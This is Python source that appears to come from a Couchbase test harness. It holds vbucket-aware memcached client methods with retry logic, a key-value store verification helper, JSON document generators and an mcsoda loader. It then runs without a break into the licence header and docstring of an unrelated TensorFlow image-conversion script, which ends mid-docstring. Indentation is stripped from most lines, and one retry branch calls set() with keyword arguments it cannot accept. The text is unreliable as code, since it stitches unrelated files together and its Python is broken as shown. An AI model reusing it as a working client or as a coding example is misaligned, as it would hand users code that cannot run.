def array_push_last_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).array_push_last_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def replace_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).replace_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas,
create=create, scope=scope, collection=collection)
@aware_call
def delete_sd(self, key, path, opaque=0, cas=0, scope=None, collection=None):
return self._send_op(self.memcached(key).delete_sd, key, path, opaque=opaque, cas=cas, scope=scope, collection=collection)
@aware_call
def dict_upsert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).dict_upsert_sd, key, path, value, expiry=expiry, opaque=opaque,
cas=cas, create=create, scope=scope, collection=collection)
@aware_call
def dict_add_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False, scope=None, collection=None):
return self._send_op(self.memcached(key).dict_add_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas,
create=create, scope=scope, collection=collection)
@aware_call
def exists_sd(self, key, path, cas=0, scope=None, collection=None):
return self._send_op(self.memcached(key).exists_sd, key, path, cas=cas, scope=scope, collection=collection)
@aware_call
def get_sd(self, key, path, cas=0, scope=None, collection=None):
return self._send_op(self.memcached(key).get_sd, key, path, cas=cas, scope=scope, collection=collection)
@aware_call
def set(self, key, exp, flags, value, scope=None, collection=None):
        return self._send_op(self.memcached(key).set, key, exp, flags, value, scope=scope, collection=collection)
@aware_call
def append(self, key, value, scope=None, collection=None):
return self._send_op(self.memcached(key).append, key, value, scope=scope, collection=collection)
@aware_call
def observe(self, key, scope=None, collection=None):
return self._send_op(self.memcached(key).observe, key, scope=scope, collection=collection)
@aware_call
def observe_seqno(self, key, vbucket_uuid, scope=None, collection=None):
return self._send_op(self.memcached(key).observe_seqno, key, vbucket_uuid, scope=scope, collection=collection)
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
self.log.info("***************resetting vbucket id***********")
vb_error += 1
else:
raise error
def get(self, key, scope=None, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key, scope=scope, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def getr(self, key, replica_index=0, scope=None, collection=None):
vb_error = 0
while True:
try:
                return self._send_op(self.memcached(key, replica_index=replica_index).getr, key, scope=scope, collection=collection)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)},
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def setMulti(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, parallel=False, scope=None, collection=None):
if parallel:
try:
import concurrent.futures
self._setMulti_parallel(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
except ImportError:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
else:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
def _setMulti_seq(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, scope=None, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
for server_str, keyval in list(server_keyval.items()):
# if the server has been removed after server_keyval has been gotten
if server_str not in self.memcacheds:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec, scope=scope, collection=collection)
else:
mc = self.memcacheds[server_str]
errors = self._setMulti_rec(mc, exp, flags, keyval, pause_sec,
timeout_sec, self._setMulti_seq, scope=scope, collection=collection)
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def _setMulti_parallel(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, scope=None, collection=None):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keyval)) as executor:
for server_str, keyval in list(server_keyval.items()):
mc = self.memcacheds[server_str]
tasks.append(
executor.submit(self._setMulti_rec, mc, exp, flags, keyval, pause_sec, timeout_sec,
self._setMulti_parallel, scope, collection))
errors = []
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout_sec):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
errors.extend(future.result())
if errors:
self.log.error(list(set(str(error) for error in errors)), exc_info=1)
raise errors[0]
def enable_collection(self, memcached_client, bucket="default"):
memcached_client.bucket_select(bucket)
memcached_client.enable_collections()
memcached_client.hello(memcacheConstants.FEATURE_COLLECTIONS)
memcached_client.get_collections(True)
def _setMulti_rec(self, memcached_client, exp, flags, keyval, pause, timeout, rec_caller_fn,
scope=None, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
errors = memcached_client.setMulti(exp, flags, keyval, scope=scope, collection=collection)
if not errors:
return []
elif timeout <= 0:
return errors
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
try:
rec_caller_fn(exp, flags, keyval, pause, timeout - pause,
scope=scope, collection=collection) # Start all over again for these key vals.
except MemcachedError as error:
if error.status == ERR_2BIG:
self.log.info("<MemcachedError #%d ``%s''>" % (error.status, error.msg))
return []
else:
return [error]
                return []  # note: if used asynchronously, too many recursive threads could get spawned here
except (EOFError, socket.error) as error:
try:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
                    rec_caller_fn(exp, flags, keyval, pause, timeout - pause, scope=scope, collection=collection)
return []
else:
return [error]
except AttributeError:
# noinspection PyPackageRequirements
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or \
"Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
                    rec_caller_fn(exp, flags, keyval, pause, timeout - pause, scope=scope, collection=collection)
return []
else:
return [error]
except BaseException as error:
if timeout <= 0:
return [error]
else:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(list(keyval.keys())))
rec_caller_fn(exp, flags, keyval, pause, timeout - pause,
scope=scope, collection=collection) # Please refer above for comments.
return []
def _get_server_keyval_dic(self, key_val_dic):
server_keyval = {}
for key, val in list(key_val_dic.items()):
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keyval:
server_keyval[server_str] = {}
server_keyval[server_str][key] = val
return server_keyval
def getMulti(self, keys_lst, pause_sec=1, timeout_sec=5, parallel=True, scope=None, collection=None):
        if parallel:
            try:
                import concurrent.futures
                return self._getMulti_parallel(keys_lst, pause_sec, timeout_sec, scope=scope, collection=collection)
            except ImportError:
                return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, scope=scope, collection=collection)
        else:
            return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, scope=scope, collection=collection)
def _getMulti_seq(self, keys_lst, pause_sec=1, timeout_sec=5, scope=None, collection=None):
server_keys = self._get_server_keys_dic(
keys_lst) # set keys in their respective vbuckets and identify the server for each vBucketId
keys_vals = {}
for server_str, keys in list(server_keys.items()): # get memcached client against each server and multi get
mc = self.memcacheds[server_str]
keys_vals.update(
self._getMulti_from_mc(mc, keys, pause_sec, timeout_sec, self._getMulti_seq,
scope=scope, collection=collection))
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(
set(keys_lst).difference(list(keys_vals.keys()))))
return keys_vals
def _getMulti_parallel(self, keys_lst, pause_sec=1, timeout_sec=5, scope=None, collection=None):
server_keys = self._get_server_keys_dic(keys_lst)
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keys)) as executor:
for server_str, keys in list(server_keys.items()):
mc = self.memcacheds[server_str]
tasks.append(
executor.submit(self._getMulti_from_mc, mc, keys, pause_sec, timeout_sec, self._getMulti_parallel,
scope=scope, collection=collection))
keys_vals = self._reduce_getMulti_values(tasks, pause_sec, timeout_sec)
if len(set(keys_lst)) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(
                set(keys_lst).difference(list(keys_vals.keys()))))
return keys_vals
def _getMulti_from_mc(self, memcached_client, keys, pause, timeout, rec_caller_fn, scope=None, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
return memcached_client.getMulti(keys, scope=scope, collection=collection)
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause, scope=scope, collection=collection)
else:
raise error
except BaseException as error:
if timeout <= 0:
raise error
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
            return rec_caller_fn(keys, pause, timeout - pause, scope=scope, collection=collection)
def _reduce_getMulti_values(self, tasks, pause, timeout):
keys_vals = {}
import concurrent.futures
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
keys_vals.update(future.result())
return keys_vals
def _get_server_keys_dic(self, keys):
server_keys = {}
for key in keys:
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keys:
server_keys[server_str] = []
server_keys[server_str].append(key)
return server_keys
def _get_vBucket_ids(self, keys, scope=None, collection=None):
return {self._get_vBucket_id(key) for key in keys}
def _get_vBucket_id(self, key, scope=None, collection=None):
return (zlib.crc32(key.encode()) >> 16) & (len(self.vBucketMap) - 1)
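    # worked example of the mapping above: with 1024 vbuckets, key "k1" lands
    # in vbucket (zlib.crc32(b"k1") >> 16) & 1023, and vBucketMap then names
    # the master "ip:port" that owns that vbucket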
def delete(self, key, scope=None, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).delete, key, scope=scope, collection=collection)
except MemcachedError as error:
if error.status in [ERR_NOT_MY_VBUCKET, ERR_EINVAL] and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([key], scope=scope, collection=collection))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
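    # _send_op retries only on ERR_ETMPFAIL, with exponential backoff starting
    # at 1 ms and capped near 0.5 s; connection drops are rethrown as
    # NOT_MY_VBUCKET so callers' vbucket-reset loops can handle them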
def _send_op(self, func, *args, **kargs):
backoff = .001
while True:
try:
return func(*args, **kargs)
except MemcachedError as error:
if error.status == ERR_ETMPFAIL and backoff < .5:
time.sleep(backoff)
backoff *= 2
else:
raise error
except (EOFError, IOError, socket.error) as error:
raise MemcachedError(ERR_NOT_MY_VBUCKET, "Connection reset with error: {0}".format(error))
    def done(self):
        for ip in self.memcacheds:
            self.memcacheds[ip].close()
def _parse_not_my_vbucket_error(self, error):
error_msg = error.msg
if "Connection reset with error:" in error_msg:
self.log.error("{0} while _send_op, server is alive?".format(error_msg))
return None
vbuckets = []
try:
error_json = json.loads(error_msg[error_msg.find('{'):error_msg.rfind('}') + 1])
        except Exception:
self.log.error("Error while getting CCCP from not_my_vbucket...\n %s" % error_msg)
return None
if 'vBucketMapForward' in error_json['vBucketServerMap']:
vBucketMap = error_json['vBucketServerMap']['vBucketMapForward']
else:
vBucketMap = error_json['vBucketServerMap']['vBucketMap']
serverList = error_json['vBucketServerMap']['serverList']
if not self.rest:
self.rest = RestConnection(self.info)
serverList = [server.replace("$HOST", str(self.rest.ip))
if server.find("$HOST") != -1 else server for server in serverList]
counter = 0
for vbucket in vBucketMap:
vbucketInfo = vBucket()
vbucketInfo.master = serverList[vbucket[0]]
if vbucket:
for i in range(1, len(vbucket)):
if vbucket[i] != -1:
vbucketInfo.replica.append(serverList[vbucket[i]])
vbucketInfo.id = counter
counter += 1
vbuckets.append(vbucketInfo)
return vbuckets
def sendHellos(self, feature_flag):
for m in self.memcacheds:
self.memcacheds[m].hello(feature_flag)
class KVStoreAwareSmartClient(VBucketAwareMemcached):
def __init__(self, rest, bucket, kv_store=None, info=None, store_enabled=True, scope=None, collection=None):
VBucketAwareMemcached.__init__(self, rest, bucket, info, scope=scope, collection=collection)
self.kv_store = kv_store or ClientKeyValueStore()
self.store_enabled = store_enabled
self._rlock = threading.Lock()
def set(self, key, value, ttl=-1, flag=0, scope=None, collection=None):
        self._rlock.acquire()
        try:
            if ttl >= 0:
                self.memcached(key).set(key, ttl, 0, value, scope=scope, collection=collection)
            else:
                self.memcached(key).set(key, 0, 0, value, scope=scope, collection=collection)
            if self.store_enabled:
                self.kv_store.write(key, hashlib.md5(value.encode()).digest(), ttl)
        except MemcachedError as e:
            raise MemcachedError(e.status, e.msg)
        except AssertionError:
            raise
        except Exception:
            raise Exception("General Exception from KVStoreAwareSmartClient.set()")
        finally:
            self._rlock.release()
"""
" retrieve meta data of document from disk
"""
def get_doc_metadata(self, num_vbuckets, key, scope=None, collection=None):
vid = crc32.crc32_hash(key) & (num_vbuckets - 1)
mc = self.memcached(key, scope=scope, collection=collection)
metadatastats = None
try:
metadatastats = mc.stats("vkey {0} {1}".format(key, vid))
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
self.log.info(msg)
return metadatastats
def delete(self, key, scope=None, collection=None):
        self._rlock.acquire()
        try:
            opaque, cas, data = self.memcached(key).delete(key, scope=scope, collection=collection)
            if self.store_enabled:
                self.kv_store.delete(key, scope=scope, collection=collection)
            if cas == 0:
                raise MemcachedError(7, "Invalid cas value")
        except MemcachedError:
            raise
        except Exception as e:
            raise MemcachedError(7, str(e))
        finally:
            self._rlock.release()
def get_valid_key(self, key, scope=None, collection=None):
return self.get_key_check_status(key, "valid", scope=scope, collection=collection)
def get_deleted_key(self, key, scope=None, collection=None):
return self.get_key_check_status(key, "deleted", scope=scope, collection=collection)
def get_expired_key(self, key, scope=None, collection=None):
return self.get_key_check_status(key, "expired", scope=scope, collection=collection)
def get_all_keys(self, scope=None, collection=None):
return self.kv_store.keys(scope=scope, collection=collection)
def get_all_valid_items(self, scope=None, collection=None):
return self.kv_store.valid_items(scope=scope, collection=collection)
def get_all_deleted_items(self, scope=None, collection=None):
return self.kv_store.deleted_items(scope=scope, collection=collection)
def get_all_expired_items(self, scope=None, collection=None):
return self.kv_store.expired_items(scope=scope, collection=collection)
def get_key_check_status(self, key, status, scope=None, collection=None):
item = self.kv_get(key, scope=scope, collection=collection)
if item is not None and item["status"] == status:
return item
else:
msg = "key {0} is not valid".format(key)
self.log.info(msg)
return None
# safe kvstore retrieval
# return dict of {key,status,value,ttl}
# or None if not found
def kv_get(self, key, scope=None, collection=None):
item = None
try:
item = self.kv_store.read(key, scope=scope, collection=collection)
except KeyError:
msg = "key {0} doesn't exist in store".format(key)
# self.log.info(msg)
return item
# safe memcached retrieval
# return dict of {key, flags, seq, value}
# or None if not found
def mc_get(self, key, scope=None, collection=None):
item = self.mc_get_full(key, scope=scope, collection=collection)
if item is not None:
item["value"] = hashlib.md5(item["value"]).digest()
return item
# unhashed value
def mc_get_full(self, key, scope=None, collection=None):
item = None
try:
x, y, value = self.memcached(key).get(key, scope=scope, collection=collection)
item = {}
item["key"] = key
item["flags"] = x
item["seq"] = y
item["value"] = value
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
return item
def kv_mc_sync_get(self, key, status, scope=None, collection=None):
self._rlock.acquire()
kv_item = self.get_key_check_status(key, status, scope=scope, collection=collection)
mc_item = self.mc_get(key, scope=scope, collection=collection)
self._rlock.release()
return kv_item, mc_item
class KVStoreSmartClientHelper(object):
@staticmethod
def do_verification(client, scope=None, collection=None):
keys = client.get_all_keys(scope=scope, collection=collection)
validation_failures = {}
for k in keys:
m, valid = KVStoreSmartClientHelper.verify_key(client, k, scope=scope, collection=collection)
            if not valid:
                validation_failures[k] = m
return validation_failures
@staticmethod
def verify_key(client, key, scope=None, collection=None):
status = False
msg = ""
item = client.kv_get(key, scope=scope, collection=collection)
if item is not None:
if item["status"] == "deleted":
msg, status = \
KVStoreSmartClientHelper.verify_delete(client, key, scope=scope, collection=collection)
elif item["status"] == "expired":
msg, status = \
KVStoreSmartClientHelper.verify_expired(client, key, scope=scope, collection=collection)
elif item["status"] == "valid":
msg, status = \
KVStoreSmartClientHelper.verify_set(client, key, scope=scope, collection=collection)
return msg, status
# verify kvstore contains key with valid status
# and that key also exists in memcached with
# expected value
@staticmethod
def verify_set(client, key, scope=None, collection=None):
kv_item = client.get_valid_key(key, scope=scope, collection=collection)
mc_item = client.mc_get(key, scope=scope, collection=collection)
status = False
msg = ""
if kv_item is not None and mc_item is not None:
# compare values
if kv_item["value"] == mc_item["value"]:
status = True
else:
msg = "kvstore and memcached values mismatch"
elif kv_item is None:
msg = "valid status not set in kv_store"
elif mc_item is None:
msg = "key missing from memcached"
return msg, status
# verify kvstore contains key with deleted status
# and that it does not exist in memcached
@staticmethod
def verify_delete(client, key, scope=None, collection=None):
deleted_kv_item = client.get_deleted_key(key, scope=scope, collection=collection)
mc_item = client.mc_get(key, scope=scope, collection=collection)
status = False
msg = ""
if deleted_kv_item is not None and mc_item is None:
status = True
elif deleted_kv_item is None:
msg = "delete status not set in kv_store"
elif mc_item is not None:
msg = "key still exists in memcached"
return msg, status
# verify kvstore contains key with expired status
# and that key has also expired in memcached
@staticmethod
def verify_expired(client, key, scope=None, collection=None):
expired_kv_item = client.get_expired_key(key, scope=scope, collection=collection)
mc_item = client.mc_get(key, scope=scope, collection=collection)
status = False
msg = ""
if expired_kv_item is not None and mc_item is None:
status = True
elif expired_kv_item is None:
msg = 'exp. status not set in kv_store'
elif mc_item is not None:
msg = "key still exists in memcached"
return msg, status
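# Usage sketch (illustrative, not part of the original helpers): run all three
# verification checks over a KVStoreAwareSmartClient and report failures.
def _example_do_verification(client):
    failures = KVStoreSmartClientHelper.do_verification(client)
    for key, message in failures.items():
        print("verification failed for {0}: {1}".format(key, message))
    return failures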
def start_reader_process(info, keyset, queue):
ReaderThread(info, keyset, queue).start()
class GeneratedDocuments(object):
    def __init__(self, items, kv_template, options=None):
        if options is None:
            options = dict(size=1024)
self._items = items
self._kv_template = kv_template
self._options = options
self._pointer = 0
if "padding" in options:
self._pad = options["padding"]
else:
self._pad = DocumentGenerator._random_string(options["size"])
self._pad = self._pad.decode()
# Required for the for-in syntax
def __iter__(self):
return self
def __len__(self):
return self._items
def reset(self):
self._pointer = 0
def has_next(self):
return self._pointer != self._items
# Returns the next value of the iterator
def __next__(self):
if self._pointer == self._items:
raise StopIteration
else:
i = self._pointer
doc = {"meta": {"id": "{0}-{1}".format(i, self._options["seed"])}, "json": {}}
for k in self._kv_template:
v = self._kv_template[k]
if isinstance(v, str) and v.find("${prefix}") != -1:
v = v.replace("${prefix}", "{0}".format(i))
# how about the value size
if isinstance(v, str) and v.find("${padding}") != -1:
v = v.replace("${padding}", self._pad)
if isinstance(v, str) and v.find("${seed}") != -1:
v = v.replace("${seed}", "{0}".format(self._options["seed"]))
doc["json"][k] = v
self._pointer += 1
return json.dumps(doc)
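# Illustrative sketch (not part of the original module): consuming
# GeneratedDocuments as an iterator; the ${prefix}/${seed} placeholders follow
# the substitution rules in __next__ above.
def _example_generated_documents():
    docs = GeneratedDocuments(2, {"name": "user-${prefix}-${seed}"},
                              {"size": 16, "seed": "abc", "padding": "x" * 16})
    return [json.loads(d)["json"]["name"] for d in docs]  # ['user-0-abc', 'user-1-abc']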
class DocumentGenerator(object):
    # will loop over all values in kv_template and replace ${prefix} with the item index
@staticmethod
    def make_docs(items, kv_template, options=None):
        # build defaults per call so each invocation gets a fresh random seed
        if options is None:
            options = dict(size=1024, seed=str(uuid.uuid4()))
        return GeneratedDocuments(items, kv_template, options)
@staticmethod
def _random_string(length):
return (("%%0%dX" % (length * 2)) % random.getrandbits(length * 8)).encode("ascii")
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
@staticmethod
def get_doc_generators(count, kv_template=None, seed=None, sizes=None):
seed = seed or str(uuid.uuid4())[0:7]
sizes = sizes or [128]
doc_gen_iterators = []
if kv_template is None:
kv_template = {"name": "doc-${prefix}-${seed}",
"sequence": "${seed}",
"email": "${prefix}@couchbase.com"}
for size in sizes:
options = {"size": size, "seed": seed}
docs = DocumentGenerator.make_docs(count // len(sizes),
kv_template, options)
doc_gen_iterators.append(docs)
return doc_gen_iterators
@staticmethod
def get_doc_generators_by_load_ratio(rest,
bucket='default',
ram_load_ratio=1,
value_size_distribution=None,
seed=None):
log = logger.Logger.get_logger()
if ram_load_ratio < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
        doc_generators = []
        info = rest.get_bucket(bucket)
        emptySpace = info.stats.ram - info.stats.memUsed
        space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
        log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
        for size, probability in value_size_distribution.items():
            how_many = int(space_to_fill / (size + 250) * probability)
            doc_seed = seed or str(uuid.uuid4())
            kv_template = {"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
                           "size": size, "seed": doc_seed}
            options = {"size": size, "seed": doc_seed}
            payload_generator = DocumentGenerator.make_docs(how_many, kv_template, options)
            doc_generators.append({'size': size, 'value': payload_generator, 'how_many': how_many, 'seed': doc_seed})
        return doc_generators
# docs = DocumentGenerator.make_docs(number_of_items,
# {"name": "user-${prefix}", "payload": "payload-${prefix}-${padding}"},
# {"size": 1024, "seed": str(uuid.uuid4())})
# Format of the json documents that mcsoda uses.
# JSON BODY
# {
# "key":"%s",
# "key_num":%s,
# "name":"%s",
# "email":"%s",
# "city":"%s",
# "country":"%s",
# "realm":"%s",
# "coins":%s,
# "achievements":%s
# }
class LoadWithMcsoda(object):
def __init__(self, master, num_docs, prefix='', bucket='default', rest_user='Administrator',
rest_password="password", protocol='membase-binary', port=11211):
rest = RestConnection(master)
self.bucket = bucket
vBuckets = rest.get_vbuckets(self.bucket)
self.vbucket_count = len(vBuckets)
self.cfg = {
'max-items': num_docs,
'max-creates': num_docs,
'min-value-size': 128,
'exit-after-creates': 1,
'ratio-sets': 1,
'ratio-misses': 0,
'ratio-creates': 1,
'ratio-deletes': 0,
'ratio-hot': 0,
'ratio-hot-sets': 1,
'ratio-hot-gets': 0,
'ratio-expirations': 0,
'expiration': 0,
'threads': 1,
'json': 1,
'batch': 10,
'vbuckets': self.vbucket_count,
'doc-cache': 0,
'doc-gen': 0,
'prefix': prefix,
'socket-timeout': 60,
}
self.protocol = protocol
self.rest_user = rest_user
self.rest_password = rest_password
if protocol == 'membase-binary':
self.host_port = "{0}:{1}:{2}".format(master.ip, master.port, port)
elif protocol == 'memcached-binary':
self.host_port = "{0}:{1}:{1}".format(master.ip, port)
self.ctl = {'run_ok': True}
def protocol_parse(self, protocol_in):
if protocol_in.find('://') >= 0:
protocol = \
'-'.join(((["membase"] + \
protocol_in.split("://"))[-2] + "-binary").split('-')[0:2])
host_port = ('@' + protocol_in.split("://")[-1]).split('@')[-1] + ":8091"
user, pswd = (('@' + protocol_in.split("://")[-1]).split('@')[-2] + ":").split(':')[0:2]
return protocol, host_port, user, pswd
def get_cfg(self):
return self.cfg
def load_data(self, scope=None, collection=None):
cur, start_time, end_time = mcsoda.run(self.cfg, {}, self.protocol, self.host_port, self.rest_user,
self.rest_password, ctl=self.ctl, bucket=self.bucket)
return cur
def load_stop(self):
self.ctl['run_ok'] = False
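# Minimal usage sketch (illustrative): drive a small mcsoda load against the
# default bucket. "master" is assumed to be a TestInputServer for the cluster.
def _example_load_with_mcsoda(master):
    loader = LoadWithMcsoda(master, num_docs=1000, prefix='example-')
    cursor = loader.load_data()  # blocks until mcsoda finishes its creates
    loader.load_stop()
    return cursor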
build_image_data.py
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one per line.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number, starting from 1
# (index 0 is left unused as the background class).
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
